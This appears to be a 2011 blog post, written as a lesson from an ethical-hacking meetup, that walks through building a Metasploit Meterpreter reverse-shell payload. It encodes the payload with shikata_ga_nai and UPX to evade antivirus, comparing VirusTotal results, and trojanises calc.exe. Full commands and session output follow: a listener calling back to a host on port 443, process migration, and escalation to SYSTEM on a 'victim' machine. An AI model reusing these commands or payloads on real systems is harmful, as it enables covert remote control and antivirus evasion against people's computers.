I’m going to jump ahead a bit this month. I’ve been attending the Offensive-Security Ohio Chapter meetings, hosted by Offensive-Security and Diebold, Incorporated, and lead by ReL1K. If you have the means and you’re just getting into the business of ethical hacking, I highly recommend attending. If you’re not in the area, the last meeting was streamed via USTREAM, so check the Offensive-Security site for details.
At the first two meetings, we learned the basics of Metasploit, Fast-Track, and SET. I’m just going to cover the topic of creating a payload and encoding it to avoid detection from anti-virus.
First, we use “msfpayload” to dump the shell code that will produce a reverse bind Meterpreter session. Meterpreter is the holy-grail of Metaploit. It allows us to easily upload/download files and run commands, steal access tokens, disable AV, enable RDP and much, much more. The reverse bind allows the session to traverse a NAT environment. We just need to assign a port that we know will pass any egress filter, such as 80 or 443. Here is the command that we use to create the raw data:
cd /pentest/exploits/framework3 msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.147 lport=443 R > moo.raw
Next, we create an executable from the raw dump and encode it with five iterations of “Shikata ga nai” (Japanese for “it can’t be helped” or “nothing can be done about it”). It is an encoding algorithm that we use to avoid detection from AV.
msfencode -i moo.raw -o moo.exe -e x86/shikata_ga_nai -c 5 -t exe
Let’s put this executable to the test. VirusTotal is an excellent site that allows to upload a file, which it will scan using numerous anti-virus engines.
| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2011.03.20.00 | 2011.03.19 | Trojan/Win32.Shell |
| AntiVir | 7.11.5.1 | 2011.03.18 | TR/Crypt.EPACK.Gen2 |
| Antiy-AVL | 2.0.3.7 | 2011.03.19 | – |
| Avast | 4.8.1351.0 | 2011.03.19 | Win32:SwPatch |
| Avast5 | 5.0.677.0 | 2011.03.19 | Win32:SwPatch |
| AVG | 10.0.0.1190 | 2011.03.19 | Win32/Heur |
| BitDefender | 7.2 | 2011.03.19 | Backdoor.Shell.AC |
| CAT-QuickHeal | 11.00 | 2011.03.19 | Win32.Trojan.Swrort.A.4 |
| ClamAV | 0.96.4.0 | 2011.03.19 | – |
| Commtouch | 5.2.11.5 | 2011.03.19 | W32/Swrort.A.gen!Eldorado |
| Comodo | 8042 | 2011.03.19 | – |
| DrWeb | 5.0.2.03300 | 2011.03.19 | – |
| Emsisoft | 5.1.0.2 | 2011.03.19 | – |
| eSafe | 7.0.17.0 | 2011.03.17 | – |
| eTrust-Vet | 36.1.8223 | 2011.03.18 | Win32/Swrort.A!generic |
| F-Prot | 4.6.2.117 | 2011.03.19 | W32/Swrort.A.gen!Eldorado |
| F-Secure | 9.0.16440.0 | 2011.03.19 | Backdoor.Shell.AC |
| Fortinet | 4.2.254.0 | 2011.03.19 | – |
| GData | 21 | 2011.03.19 | Backdoor.Shell.AC |
| Ikarus | T3.1.1.97.0 | 2011.03.19 | – |
| Jiangmin | 13.0.900 | 2011.03.18 | – |
| K7AntiVirus | 9.94.4155 | 2011.03.19 | Riskware |
| Kaspersky | 7.0.0.125 | 2011.03.19 | – |
| McAfee | 5.400.0.1158 | 2011.03.19 | – |
| McAfee-GW-Edition | 2010.1C | 2011.03.19 | – |
| Microsoft | 1.6603 | 2011.03.19 | Trojan:Win32/Swrort.A |
| NOD32 | 5968 | 2011.03.19 | a variant of Win32/Rozena.AH |
| Norman | 6.07.03 | 2011.03.19 | – |
| nProtect | 2011-02-10.01 | 2011.02.15 | Backdoor.Shell.AC |
| Panda | 10.0.3.5 | 2011.03.19 | Suspicious file |
| PCTools | 7.0.3.5 | 2011.03.19 | – |
| Prevx | 3.0 | 2011.03.20 | – |
| Rising | 23.49.04.05 | 2011.03.18 | – |
| Sophos | 4.63.0 | 2011.03.20 | Mal/Swrort-C |
| SUPERAntiSpyware | 4.40.0.1006 | 2011.03.19 | Trojan.Backdoor-PoisonIvy |
| Symantec | 20101.3.0.103 | 2011.03.19 | – |
| TheHacker | 6.7.0.1.152 | 2011.03.19 | – |
| TrendMicro | 9.200.0.1012 | 2011.03.19 | – |
| TrendMicro-HouseCall | 9.200.0.1012 | 2011.03.19 | – |
| VBA32 | 3.12.14.3 | 2011.03.18 | – |
| VIPRE | 8758 | 2011.03.20 | Trojan.Win32.Swrort.B (v) |
| ViRobot | 2011.3.19.4366 | 2011.03.19 | – |
| VirusBuster | 13.6.258.0 | 2011.03.19 | Trojan.Rosena.Gen.1 |
Not bad, but hopefully we can do better. Another trick ReL1k taught us was to use a UPX packer, which will further help us avoid being detected. Here is the command to create a “packed” executable:
/pentest/database/sqlmap/lib/contrib/upx/linux/upx -9 -o moo_packed.exe moo.exe
| Antivirus | Version | Last update | Result |
|---|---|---|---|
| AhnLab-V3 | 2011.03.20.00 | 2011.03.19 | – |
| AntiVir | 7.11.5.1 | 2011.03.18 | TR/Crypt.ZPACK.Gen |
| Antiy-AVL | 2.0.3.7 | 2011.03.19 | – |
| Avast | 4.8.1351.0 | 2011.03.19 | – |
| Avast5 | 5.0.677.0 | 2011.03.19 | – |
| AVG | 10.0.0.1190 | 2011.03.20 | Win32/Heur |
| BitDefender | 7.2 | 2011.03.19 | Gen:Variant.Kazy.7277 |
| CAT-QuickHeal | 11.00 | 2011.03.19 | – |
| ClamAV | 0.96.4.0 | 2011.03.19 | – |
| Commtouch | 5.2.11.5 | 2011.03.19 | – |
| Comodo | 8042 | 2011.03.19 | – |
| DrWeb | 5.0.2.03300 | 2011.03.19 | – |
| Emsisoft | 5.1.0.2 | 2011.03.20 | – |
| eSafe | 7.0.17.0 | 2011.03.17 | – |
| eTrust-Vet | 36.1.8223 | 2011.03.18 | – |
| F-Prot | 4.6.2.117 | 2011.03.19 | – |
| F-Secure | 9.0.16440.0 | 2011.03.19 | Gen:Variant.Kazy.7277 |
| Fortinet | 4.2.254.0 | 2011.03.19 | – |
| GData | 21 | 2011.03.19 | Gen:Variant.Kazy.7277 |
| Ikarus | T3.1.1.97.0 | 2011.03.19 | – |
| Jiangmin | 13.0.900 | 2011.03.18 | – |
| K7AntiVirus | 9.94.4155 | 2011.03.19 | – |
| Kaspersky | 7.0.0.125 | 2011.03.19 | – |
| McAfee | 5.400.0.1158 | 2011.03.19 | – |
| McAfee-GW-Edition | 2010.1C | 2011.03.19 | – |
| Microsoft | 1.6603 | 2011.03.19 | – |
| NOD32 | 5968 | 2011.03.19 | – |
| Norman | 6.07.03 | 2011.03.19 | – |
| nProtect | 2011-02-10.01 | 2011.02.15 | Gen:Variant.Kazy.7277 |
| Panda | 10.0.3.5 | 2011.03.19 | Suspicious file |
| PCTools | 7.0.3.5 | 2011.03.19 | – |
| Prevx | 3.0 | 2011.03.20 | – |
| Rising | 23.49.04.05 | 2011.03.18 | – |
| Sophos | 4.63.0 | 2011.03.20 | – |
| SUPERAntiSpyware | 4.40.0.1006 | 2011.03.19 | – |
| Symantec | 20101.3.0.103 | 2011.03.20 | Suspicious.MH690.A |
| TheHacker | 6.7.0.1.152 | 2011.03.19 | – |
| TrendMicro | 9.200.0.1012 | 2011.03.19 | PAK_Generic.001 |
| TrendMicro-HouseCall | 9.200.0.1012 | 2011.03.20 | PAK_Generic.001 |
| VBA32 | 3.12.14.3 | 2011.03.18 | – |
| VIPRE | 8758 | 2011.03.20 | – |
| ViRobot | 2011.3.19.4366 | 2011.03.19 | – |
| VirusBuster | 13.6.258.0 | 2011.03.19 | – |
It’s not perfect, but definitely better. There’s always going to be a cat-and-mouse game between the hackers and the anti-virus vendors.
One more trick. What if we want to attach the Meterpreter payload to a known good executable, such as “calc.exe”? Here’s a quick one-liner.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.147 LPORT=443 R | msfencode -x ./calc.exe -k -e x86/shikata_ga_nai -c 5 -t exe -o payload_calc.exe
Then we just need to setup a listener using Metasploit’s “multi/handler”, copy “payload_calc.exe” to the victim machine and execute it.
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.147 LHOST => 192.168.0.147 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.147:443 [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage (749056 bytes) to 192.168.0.123 [*] Meterpreter session 1 opened (192.168.0.147:443 -> 192.168.0.123:1089) at Mon Mar 21 17:17:07 -0400 2011 msf exploit(handler) > sessions -i Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x86/win32 BUDLITE\spohnl @ BUDLITE 192.168.0.147:443 -> 192.168.0.123:1089 msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter >
Booya! We have a Meterpreter session and the victim is none the wiser. As a final step, we’ll want to migrate the Meterpreter session off of the calc executable so we can maintain our session after calc is closed. Oh, and don’t forget to upgrade your access to SYSTEM!
meterpreter > ps Process list ============ PID Name Arch Session User Path --- ---- ---- ------- ---- ---- 0 [System Process] 4 System x86 0 540 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe 636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe 680 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe 692 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe 848 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe 864 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe 940 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1044 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 1120 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1288 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe 1436 explorer.exe x86 0 BUDLITE\spohnl C:\WINDOWS\Explorer.EXE 1532 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe 1720 VMwareTray.exe x86 0 BUDLITE\spohnl C:\Program Files\VMware\VMware Tools\VMwareTray.exe 1736 VMwareUser.exe x86 0 BUDLITE\spohnl C:\Program Files\VMware\VMware Tools\VMwareUser.exe 1892 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe 1940 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe 224 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe 244 sqlbrowser.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe 336 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 376 VMUpgradeHelper.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe 2148 alg.exe x86 0 C:\WINDOWS\System32\alg.exe 3364 wuauclt.exe x86 0 BUDLITE\spohnl C:\WINDOWS\system32\wuauclt.exe 3372 cmd.exe x86 0 BUDLITE\spohnl C:\WINDOWS\system32\cmd.exe 2508 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe 3700 payload_calc.exe x86 0 BUDLITE\spohnl C:\WINDOWS\system32\payload_calc.exe meterpreter > migrate 1436 [*] Migrating to 1436... [*] Migration completed successfully. meterpreter > getuid Server username: BUDLITE\spohnl meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
That’s all there is to it. Now you can have your way with this system!